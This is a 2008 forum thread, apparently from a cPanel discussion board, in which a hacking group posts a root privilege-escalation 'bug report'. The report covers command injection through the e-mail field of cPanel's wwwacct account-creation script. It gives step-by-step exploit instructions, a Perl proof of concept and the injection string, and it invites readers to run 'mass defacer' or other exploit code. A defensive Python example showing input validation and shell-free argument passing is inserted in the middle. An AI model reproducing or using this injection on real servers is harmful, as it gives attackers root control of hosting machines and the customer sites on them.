bug report : root access with a reseller account.

Discussion in 'General Discussion' started by php-empire, Nov 8, 2008.

  1. php-empire

    php-empire Registered

    By Ali Jasbi, IHST security hacking Research team
    WwW.Hackerz.ir
    Vendor: Cpanel.net
    Version: ALL !!
    Risk: Very high
    What u can do with this bug is:
    u can have access to all the server with reseller privilege (Th3 r00t)
    How does it work?
    When u want to create an account in shell, what will happen?
    ./script/wwwact [domainname] [username] [password] [Email address] lab lab lab
    U can run that with a web-based program! (cpanel: domain:2086)
    Example:
    http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab
    It means you got access to wwwacct in the scripts folder (Th3 r00t)
    so u can run other commands with root access like that:
    ./scripts/wwwactt domain.com domain password ali_at_hackerz.ir;./home/hackerz/public_html/do.pl (your command now is ./home/hackerz/public_html/do.pl)
    U can likewise run it in the web-based program. What u need to do is just write ali_at_hackerz.ir;./home/hackerz/public_html/do.pl in the Email text box when u want to create an account.
    ()()()()()()()()()()()()()
    Test it:
    ++++++++++++++++++++++++++
    Step 1

    Save this file in /home/user/public_html/do.pl .
    #!/usr/bin/perl
    $old='/home/user/public_html/test.txt';
    $new='/home/root/kon.txt';
    rename $old, $new;
    ++++++++++++++++++++++++++
    Step 2

    Make a text file named test.txt in your public_html directory.
    The path will be: /home/user/public_html/test.txt .
    ++++++++++++++++++++++++++
    Step 3

    Create an account and write ali_at_hackerz.ir;./home/user/public_html/do.pl in the E-mail Address text box,
    then click on the "create" button.
    Yes, you can find your file in /home/root/ .
    ++++++++++++++++++++++++++
    ()()()()()()()()()()()()()
    You can run your own code! (mass defacer, exploit,
    or everything that u want).
    Enjoy it...

    Hello cPanel security team,
    did you patch this bug in the new version?
    Very critical :(
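
The post above describes a `;` in the e-mail field being carried into a command line that runs as root. As an added example (not part of the thread and not cPanel's code), this shows the defensive pattern: allow-list every field and hand the program an argument vector instead of a shell string. The `/scripts/wwwacct` path comes from the post; the regexes, function names and sample values are assumptions constructed for illustration.

```python
import re
import shlex

WWWACCT = "/scripts/wwwacct"  # script path as named in the post

# Allow-lists are assumptions for this example, not cPanel's own rules.
FIELD_RULES = {
    "domain": re.compile(r"[a-z0-9]([a-z0-9.-]{0,251}[a-z0-9])?\Z", re.I),
    "user": re.compile(r"[a-z][a-z0-9]{0,15}\Z"),
    "email": re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,253}\Z"),
}


def naive_command(domain, user, password, email):
    """Unsafe pattern: fields interpolated into one string meant for a shell."""
    return f"{WWWACCT} {domain} {user} {password} {email}"


def shell_operators(cmdline):
    """List the operator tokens ( ; & | < > ( ) ) found by shlex, which
    approximates how a POSIX shell would split cmdline."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return [tok for tok in lexer if set(tok) <= set("();<>|&")]


def build_argv(domain, user, password, email):
    """Validate every field, then return an argv list for exec without a shell."""
    fields = {"domain": domain, "user": user, "email": email}
    for name, value in fields.items():
        if not FIELD_RULES[name].match(value):
            raise ValueError(f"rejected {name}: {value!r}")
    if not password or any(ch.isspace() or not ch.isprintable() for ch in password):
        raise ValueError("rejected password")
    # Each element reaches the program as one argument; ';' has no meaning here.
    return [WWWACCT, domain, user, password, email]


if __name__ == "__main__":
    # Constructed sample values, shaped like the e-mail field described in the post.
    bad = "user@example.test;/home/user/public_html/do.pl"
    print(shell_operators(naive_command("example.test", "newacct", "S3cretPw", bad)))
    try:
        build_argv("example.test", "newacct", "S3cretPw", bad)
    except ValueError as exc:
        print(exc)
```

The list returned by `build_argv` is meant for `subprocess.run(argv)` with `shell` left at its default of `False`; `shell_operators` only illustrates what the string form exposes and is not itself a filter.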
     
  2. weetabix

    weetabix Well-Known Member

  3. php-empire

    php-empire Registered

    Thank u very much,
    have a good time :)
     